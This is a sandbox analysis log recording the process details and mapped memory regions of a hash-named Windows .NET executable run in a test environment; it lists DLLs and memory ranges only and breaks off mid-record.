# Flog Txt Version 1
# Analyzer Version: 4.6.0
# Analyzer Build Date: Jul 8 2022 06:26:21
# Log Creation Date: 05.08.2022 09:50:53.595
Process:
id = "1"
image_name = "7907827ba244123ddc19a986203a2df7f7b9e7d984ff8efe6715372e2f431062.exe"
filename = "c:\\users\\rdhj0cnfevzx\\desktop\\7907827ba244123ddc19a986203a2df7f7b9e7d984ff8efe6715372e2f431062.exe"
page_root = "0x5b3e7000"
os_pid = "0x1394"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "analysis_target"
parent_id = "0"
os_parent_pid = "0x7b4"
cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\7907827ba244123ddc19a986203a2df7f7b9e7d984ff8efe6715372e2f431062.exe\" "
cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
os_username = "XC64ZB\\RDhJ0CNFevzX"
bitness = "32"
os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fa87" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 117
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 118
start_va = 0x30000
end_va = 0x31fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000030000"
filename = ""
Region:
id = 119
start_va = 0x40000
end_va = 0x54fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 120
start_va = 0x60000
end_va = 0x9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000060000"
filename = ""
Region:
id = 121
start_va = 0xa0000
end_va = 0x19ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000a0000"
filename = ""
Region:
id = 122
start_va = 0x1a0000
end_va = 0x1a3fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001a0000"
filename = ""
Region:
id = 123
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001b0000"
filename = ""
Region:
id = 124
start_va = 0x1c0000
end_va = 0x1c1fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001c0000"
filename = ""
Region:
id = 125
start_va = 0x200000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000200000"
filename = ""
Region:
id = 126
start_va = 0x400000
end_va = 0x4d9fff
monitored = 1
entry_point = 0x4ac276
region_type = mapped_file
name = "7907827ba244123ddc19a986203a2df7f7b9e7d984ff8efe6715372e2f431062.exe"
filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\7907827ba244123ddc19a986203a2df7f7b9e7d984ff8efe6715372e2f431062.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\7907827ba244123ddc19a986203a2df7f7b9e7d984ff8efe6715372e2f431062.exe")
Region:
id = 127
start_va = 0x771d0000
end_va = 0x7734afff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")
Region:
id = 128
start_va = 0x7ffb0000
end_va = 0x7ffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007ffb0000"
filename = ""
Region:
id = 129
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 130
start_va = 0x7fff0000
end_va = 0x7ffa1676ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007fff0000"
filename = ""
Region:
id = 131
start_va = 0x7ffa16770000
end_va = 0x7ffa16930fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 132
start_va = 0x7ffa16931000
end_va = 0x7ffffffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00007ffa16931000"
filename = ""
Region:
id = 271
start_va = 0x4e0000
end_va = 0x54ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000004e0000"
filename = ""
Region:
id = 272
start_va = 0x640d0000
end_va = 0x6411ffff
monitored = 0
entry_point = 0x640e8180
region_type = mapped_file
name = "wow64.dll"
filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")
Region:
id = 273
start_va = 0x64050000
end_va = 0x640c9fff
monitored = 0
entry_point = 0x64063290
region_type = mapped_file
name = "wow64win.dll"
filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")
Region:
id = 274
start_va = 0x76720000
end_va = 0x767fffff
monitored = 0
entry_point = 0x76733980
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")
Region:
id = 275
start_va = 0x64120000
end_va = 0x64127fff
monitored = 0
entry_point = 0x641217c0
region_type = mapped_file
name = "wow64cpu.dll"
filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")
Region:
id = 276
start_va = 0x550000
end_va = 0x78ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000550000"
filename = ""
Region:
id = 277
start_va = 0x6ebe0000
end_va = 0x6ec38fff
monitored = 1
entry_point = 0x6ebf0780
region_type = mapped_file
name = "mscoree.dll"
filename = "\\Windows\\SysWOW64\\mscoree.dll" (normalized: "c:\\windows\\syswow64\\mscoree.dll")
Region:
id = 278
start_va = 0x76720000
end_va = 0x767fffff
monitored = 0
entry_point = 0x76733980
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")
Region:
id = 279
start_va = 0x76910000
end_va = 0x76a8dfff
monitored = 0
entry_point = 0x769c1b90
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")
Region:
id = 280
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 281
start_va = 0x7feb0000
end_va = 0x7ffaffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007feb0000"
filename = ""
Region:
id = 282
start_va = 0x550000
end_va = 0x60dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 283
start_va = 0x690000
end_va = 0x78ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000690000"
filename = ""
Region:
id = 284
start_va = 0x790000
end_va = 0x96ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000790000"
filename = ""
Region:
id = 285
start_va = 0x73e50000
end_va = 0x73ee1fff
monitored = 0
entry_point = 0x73e90380
region_type = mapped_file
name = "apphelp.dll"
filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll")
Region:
id = 286
start_va = 0x7fb00000
end_va = 0x7fea0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sysmain.sdb"
filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb")
Region:
id = 287
start_va = 0x20000
end_va = 0x23fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 288
start_va = 0x76600000
end_va = 0x7667afff
monitored = 0
entry_point = 0x7661e970
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")
Region:
id = 289
start_va = 0x76a90000
end_va = 0x76b4dfff
monitored = 0
entry_point = 0x76ac5630
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")
Region:
id = 290
start_va = 0x4e0000
end_va = 0x51ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000004e0000"
filename = ""
Region:
id = 291
start_va = 0x540000
end_va = 0x54ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000540000"
filename = ""
Region:
id = 292
start_va = 0x790000
end_va = 0x88ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000790000"
filename = ""
Region:
id = 293
start_va = 0x960000
end_va = 0x96ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000960000"
filename = ""
Region:
id = 294
start_va = 0x76cb0000
end_va = 0x76cf3fff
monitored = 0
entry_point = 0x76cc9d80
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")
Region:
id = 295
start_va = 0x76c00000
end_va = 0x76cacfff
monitored = 0
entry_point = 0x76c14f00
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")
Region:
id = 296
start_va = 0x73f00000
end_va = 0x73f1dfff
monitored = 0
entry_point = 0x73f0b640
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")
Region:
id = 297
start_va = 0x73ef0000
end_va = 0x73ef9fff
monitored = 0
entry_point = 0x73ef2a00
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")
Region:
id = 298
start_va = 0x76840000
end_va = 0x76897fff
monitored = 0
entry_point = 0x768825c0
region_type = mapped_file
name = "bcryptprimitives.dll"
filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")
Region:
id = 299
start_va = 0x610000
end_va = 0x64ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000610000"
filename = ""
Region:
id = 300
start_va = 0x6f6f0000
end_va = 0x6f76cfff
monitored = 1
entry_point = 0x6f700db0
region_type = mapped_file
name = "mscoreei.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll")
Region:
id = 301
start_va = 0x76d00000
end_va = 0x76d44fff
monitored = 0
entry_point = 0x76d1de90
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")
Region:
id = 302
start_va = 0x762b0000
end_va = 0x7646cfff
monitored = 0
entry_point = 0x76392a10
region_type = mapped_file
name = "combase.dll"
filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll")
Region:
id = 303
start_va = 0x74ab0000
end_va = 0x74bfefff
monitored = 0
entry_point = 0x74b66820
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")
Region:
id = 304
start_va = 0x743d0000
end_va = 0x74516fff
monitored = 0
entry_point = 0x743e1cf0
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")
Region:
id = 305
start_va = 0x1d0000
end_va = 0x1f9fff
monitored = 0
entry_point = 0x1d5680
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 306
start_va = 0x970000
end_va = 0xaf7fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000970000"
filename = ""
Region:
id = 307
start_va = 0x741b0000
end_va = 0x741dafff
monitored = 0
entry_point = 0x741b5680
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 308
start_va = 0x30000
end_va = 0x30fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000030000"
filename = ""
Region:
id = 309
start_va = 0x1d0000
end_va = 0x1d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001d0000"
filename = ""
Region:
id = 310
start_va = 0xb00000
end_va = 0xc80fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000b00000"
filename = ""
Region:
id = 311
start_va = 0xc90000
end_va = 0x208ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000c90000"
filename = ""
Region:
id = 312
start_va = 0x2090000
end_va = 0x2162fff
monitored = 1
entry_point = 0x213c276
region_type = mapped_file
name = "7907827ba244123ddc19a986203a2df7f7b9e7d984ff8efe6715372e2f431062.exe"
filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\7907827ba244123ddc19a986203a2df7f7b9e7d984ff8efe6715372e2f431062.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\7907827ba244123ddc19a986203a2df7f7b9e7d984ff8efe6715372e2f431062.exe")
Region:
id = 313
start_va = 0x76d50000
end_va = 0x76d5bfff
monitored = 0
entry_point = 0x76d53930
region_type = mapped_file
name = "kernel.appcore.dll"
filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll")
Region:
id = 314
start_va = 0x6f8a0000
end_va = 0x6f8a7fff
monitored = 0
entry_point = 0x6f8a17b0
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll")
Region:
id = 315
start_va = 0x6f000000
end_va = 0x6f6e0fff
monitored = 1
entry_point = 0x6f02cd70
region_type = mapped_file
name = "clr.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll")
Region:
id = 316
start_va = 0x6f7a0000
end_va = 0x6f894fff
monitored = 0
entry_point = 0x6f7f4160
region_type = mapped_file
name = "msvcr120_clr0400.dll"
filename = "\\Windows\\SysWOW64\\msvcr120_clr0400.dll" (normalized: "c:\\windows\\syswow64\\msvcr120_clr0400.dll")
Region:
id = 317
start_va = 0x1e0000
end_va = 0x1e0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001e0000"
filename = ""
Region:
id = 318
start_va = 0x1f0000
end_va = 0x1fffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001f0000"
filename = ""
Region:
id = 319
start_va = 0x520000
end_va = 0x52ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000520000"
filename = ""
Region:
id = 320
start_va = 0x530000
end_va = 0x53ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000530000"
filename = ""
Region:
id = 321
start_va = 0x610000
end_va = 0x61ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000610000"
filename = ""
Region:
id = 322
start_va = 0x640000
end_va = 0x64ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000640000"
filename = ""
Region:
id = 323
start_va = 0x620000
end_va = 0x62ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000620000"
filename = ""
Region:
id = 324
start_va = 0x630000
end_va = 0x63ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000630000"
filename = ""
Region:
id = 325
start_va = 0x650000
end_va = 0x650fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000650000"
filename = ""
Region:
id = 326
start_va = 0x660000
end_va = 0x660fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000660000"
filename = ""
Region:
id = 327
start_va = 0x2090000
end_va = 0x222ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002090000"
filename = ""
Region:
id = 328
start_va = 0x2090000
end_va = 0x216ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002090000"
filename = ""
Region:
id = 329
start_va = 0x2220000
end_va = 0x222ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002220000"
filename = ""
Region:
id = 330
start_va = 0x890000
end_va = 0x8cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000890000"
filename = ""
Region:
id = 331
start_va = 0x2230000
end_va = 0x232ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002230000"
filename = ""
Region:
id = 332
start_va = 0x670000
end_va = 0x67ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000670000"
filename = ""
Region:
id = 333
start_va = 0x2330000
end_va = 0x432ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002330000"
filename = ""
Region:
id = 334
start_va = 0x2090000
end_va = 0x212ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002090000"
filename = ""
Region:
id = 335
start_va = 0x2160000
end_va = 0x216ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002160000"
filename = ""
Region:
id = 336
start_va = 0x8d0000
end_va = 0x90ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000008d0000"
filename = ""
Region:
id = 337
start_va = 0x4330000
end_va = 0x442ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004330000"
filename = ""
Region:
id = 338
start_va = 0x4430000
end_va = 0x4766fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 339
start_va = 0x6d920000
end_va = 0x6ebd1fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "mscorlib.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\7582400666d289c016013ad0f6e0e3e6\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\7582400666d289c016013ad0f6e0e3e6\\mscorlib.ni.dll")
Region:
id = 340
start_va = 0x74dc0000
end_va = 0x74eaafff
monitored = 0
entry_point = 0x74dfd650
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")
Region:
id = 341
start_va = 0x2170000
end_va = 0x2200fff
monitored = 0
entry_point = 0x21a8cf0
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")
Region:
id = 342
start_va = 0x72cb0000
end_va = 0x72d24fff
monitored = 0
entry_point = 0x72ce9a60
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll")
Region:
id = 343
start_va = 0x4770000
end_va = 0x495ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004770000"
filename = ""
Region:
id = 344
start_va = 0x6cf50000
end_va = 0x6d91bfff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "system.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\1be7a15b1f33bf22e4f53aaf45518c77\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\1be7a15b1f33bf22e4f53aaf45518c77\\system.ni.dll")
Region:
id = 345
start_va = 0x6c820000
end_va = 0x6cf40fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "system.core.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\eb4cca4f06a15158c3f7e2c56516729b\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\eb4cca4f06a15158c3f7e2c56516729b\\system.core.ni.dll")
Region:
id = 346
start_va = 0x6c430000
end_va = 0x6c812fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "windowsbase.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\WindowsBase\\9a2107b30cbb02ca475f58ed046eff63\\WindowsBase.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\windowsbase\\9a2107b30cbb02ca475f58ed046eff63\\windowsbase.ni.dll")
Region:
id = 347
start_va = 0x70fe0000
end_va = 0x70ff2fff
monitored = 0
entry_point = 0x70fe9950
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll")
Region:
id = 348
start_va = 0x70010000
end_va = 0x7003efff
monitored = 0
entry_point = 0x700295e0
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 349
start_va = 0x71340000
end_va = 0x7135afff
monitored = 0
entry_point = 0x71349050
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll")
Region:
id = 350
start_va = 0x6b910000
end_va = 0x6c428fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "presentationcore.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\PresentationCore\\d7a637fdf68801e37fc897b530f9a8a6\\PresentationCore.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\presentationcore\\d7a637fdf68801e37fc897b530f9a8a6\\presentationcore.ni.dll")
Region:
id = 351
start_va = 0x6a670000
end_va = 0x6b902fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "presentationframework.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Presentatio5ae0f00f#\\56617af3d6fd992497999aec2be809a4\\PresentationFramework.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\presentatio5ae0f00f#\\56617af3d6fd992497999aec2be809a4\\presentationframework.ni.dll")
Region:
id = 352
start_va = 0x670000
end_va = 0x67ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000670000"
filename = ""
Region:
id = 353
start_va = 0x6ef80000
end_va = 0x6effffff
monitored = 1
entry_point = 0x6ef81180
region_type = mapped_file
name = "clrjit.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clrjit.dll")
Region:
id = 354
start_va = 0x76680000
end_va = 0x76711fff
monitored = 0
entry_point = 0x766b8cf0
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")
Region:
id = 355
start_va = 0x680000
end_va = 0x68ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000680000"
filename = ""
Region:
id = 356
start_va = 0x6edf0000
end_va = 0x6ef7efff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "system.drawing.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\1d52bd4ac5e0a6422058a5d62c9f6d9d\\System.Drawing.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.drawing\\1d52bd4ac5e0a6422058a5d62c9f6d9d\\system.drawing.ni.dll")
Region:
id = 357
start_va = 0x69a00000
end_va = 0x6a666fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "system.windows.forms.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\fb06ad4bc55b9c3ca68a3f9259d826cd\\System.Windows.Forms.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.windows.forms\\fb06ad4bc55b9c3ca68a3f9259d826cd\\system.windows.forms.ni.dll")
Region:
id = 358
start_va = 0x910000
end_va = 0x910fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000910000"
filename = ""
Region:
id = 359
start_va = 0x910000
end_va = 0x911fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000910000"
filename = ""
Region:
id = 360
start_va = 0x920000
end_va = 0x92ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000920000"
filename = ""
Region:
id = 361
start_va = 0x2170000
end_va = 0x21fefff
monitored = 0
entry_point = 0x217dd60
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll")
Region:
id = 362
start_va = 0x6ed50000
end_va = 0x6ede1fff
monitored = 0
entry_point = 0x6ed5dd60
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll")
Region:
id = 363
start_va = 0x4770000
end_va = 0x489ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004770000"
filename = ""
Region:
id = 364
start_va = 0x4950000
end_va = 0x495ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004950000"
filename = ""
Region:
id = 365
start_va = 0x930000
end_va = 0x930fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000930000"
filename = ""
Region:
id = 366
start_va = 0x4770000
end_va = 0x482bfff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000004770000"
filename = ""
Region:
id = 367
start_va = 0x4890000
end_va = 0x489ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004890000"
filename = ""
Region:
id = 368
start_va = 0x930000
end_va = 0x933fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000930000"
filename = ""
Region:
id = 369
start_va = 0x940000
end_va = 0x943fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000940000"
filename = ""
Region:
id = 370
start_va = 0x4960000
end_va = 0x4b6afff
monitored = 0
entry_point = 0x4a0b0a0
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll")
Region:
id = 371
start_va = 0x72dd0000
end_va = 0x72fdefff
monitored = 0
entry_point = 0x72e7b0a0
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll")
Region:
id = 372
start_va = 0x950000
end_va = 0x950fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "windowsshell.manifest"
filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")
Region:
id = 373
start_va = 0x2130000
end_va = 0x2131fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002130000"
filename = ""
Region:
id = 374
start_va = 0x4960000
end_va = 0x4a7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004960000"
filename = ""
Region:
id = 375
start_va = 0x71180000
end_va = 0x7119cfff
monitored = 0
entry_point = 0x71183b10
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll")
Region:
id = 376
start_va = 0x950000
end_va = 0x95ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000950000"
filename = ""
Region:
id = 377
start_va = 0x2140000
end_va = 0x214ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002140000"
filename = ""
Region:
id = 378
start_va = 0x2150000
end_va = 0x215ffff
monitored = 1
entry_point = 0x0
